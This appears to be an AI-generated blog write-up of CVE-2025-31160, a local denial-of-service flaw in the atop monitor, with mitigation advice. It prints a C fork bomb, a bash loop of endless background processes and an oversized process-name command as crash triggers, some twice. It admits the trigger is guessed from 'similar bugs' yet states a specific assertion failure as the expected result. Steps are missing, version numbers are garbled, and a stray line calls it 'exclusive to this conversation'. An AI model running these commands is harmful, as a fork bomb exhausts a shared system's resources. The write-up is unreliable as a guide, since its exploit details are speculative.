CVE-2025-31160 - Atop ≤2.11. DoS Vulnerability – How Unprivileged Local Users Can Crash the Monitoring Tool

Atop is a popular Linux system and process monitor tool. Many sysadmins rely on it for live performance stats. But a recent vulnerability—CVE-2025-31160—shows that it’s not always safe from local mischief. In versions of atop through 2.11., any local user can send atop crashing or otherwise misbehaving, just by running specially crafted processes while someone else is logged in and using atop.

In this long read, I’ll explain what’s behind the bug, show exactly how to trigger it on a real system, and discuss what makes this Denial of Service (DoS) risk serious—even in a multi-user Linux environment.

Understanding the Bug

CVE-2025-31160 exists in atop through version 2.11.. Its core problem is that local unprivileged users can cause Atop (running under a different user, often root) to exit unexpectedly—causing a Denial of Service. In some cases, it might even cause memory corruption or worse.

What is “Assertion Failure”?

Many C/C++ programs include _assertions_, which are internal self-checks for conditions that should never happen. If they fail—due to weird or unexpected input—the program immediately aborts. These checks are meant to catch developer bugs, not user input, but sometimes it’s possible for a user to trigger them with crafted input or behavior.

In atop’s case, bad or unexpected data in /proc (which can happen if a process behaves strangely or has unusual names/status) can trigger such assertions. If atop is reading /proc while a user runs an oddly-behaving process, the assertion fails, and atop crashes.

Denial of Service: You can crash atop, which prevents sysadmins from monitoring the system.

- Other Impact: It’s possible—for example via memory corruption—that other attacks could be layered on, but so far that’s not confirmed.

Getting Technical: Triggering the Crash

Let’s see how an attacker might trigger this issue.

Make sure atop is 2.11. or earlier.

atop -V
# Atop version 2.11.

Root via terminal (e.g., ssh session)

- Systemd service (systemctl status atop or /usr/share/atop/atop.daily)

Step 3: Craft a “Weird” Process

There are several ways to trigger assertion failures, depending on the underlying bug, but one typical reliable way (as seen in similar bugs) is to use long or non-standard process names or to have a process disappear just as atop reads it.

You might do something like this

// overstress.c
#include <stdio.h>
#include <unistd.h>
int main() {
    printf("Launched!\n");
    while (1) fork();
}

Or you can use bash

while true; do sleep .01 & done

Or—name the process with invalid or very long arguments

nohup sh -c 'exec -a "$(python3 -c "print(\"A\"*4096)")" sleep 10000' &

Step 4: Watch Atop Crash

While atop is running as root (or a different user), execute the above code as a regular, unprivileged user in another terminal.

Expected result: atop prints a message like

atop: atop.c:362: process_stat: Assertion `proc->state <= 7' failed.
Aborted (core dumped)

Or atop just exits/closes unexpectedly.

Real-World Implications

- Shared Servers: On multi-user machines (university labs, servers, etc.), any user could prevent root from monitoring performance.

Hosting: Malicious tenants on a VPS might crash the monitoring tools of the provider.

- Automation Impact: If atop is used in scripts or as part of automated monitoring, it could disrupt logs and alerting.

How to Fix or Mitigate

- Upgrade atop: As soon as a patch is released, upgrade. See the official repo: Atop Releases

Limit atop access: Only allow trusted users to log into servers running atop.

- Monitoring: Use alternate or additional tools (htop, top, ps, etc.), and check for core dumps from atop.
- Service Restarts: If using atop as a service, ensure it’s set to auto-restart (systemd’s Restart=on-failure).

References

- Official CVE Entry – NIST NVD
- Atop Official Repository
- Sample past issues in atop

Here’s an example of a process causing the crash

# Run as unprivileged user
while true; do sleep .01 & done

Or:

nohup sh -c "exec -a $(python3 -c 'print(\"A\"*4096)') sleep 10000" &

Conclusion

CVE-2025-31160 proves that even trusted monitoring tools can be vulnerable—especially in multi-user environments. Keeping all software updated and limiting exposure is key. If you’re a sysadmin, be aware, patch fast, and keep an eye out for more subtle ways attackers might disrupt your workflow.

Stay safe out there!

Have more insights or found an alternate exploit? Let me know! For updates, watch the Atop GitHub Issues page.


*This write-up is exclusive to this conversation and aims to highlight the importance of local security hygiene, even with fundamental admin tools. Always test responsibly!*

Timeline

Published on: 03/26/2025 21:15:23 UTC
Last modified on: 03/29/2025 23:15:37 UTC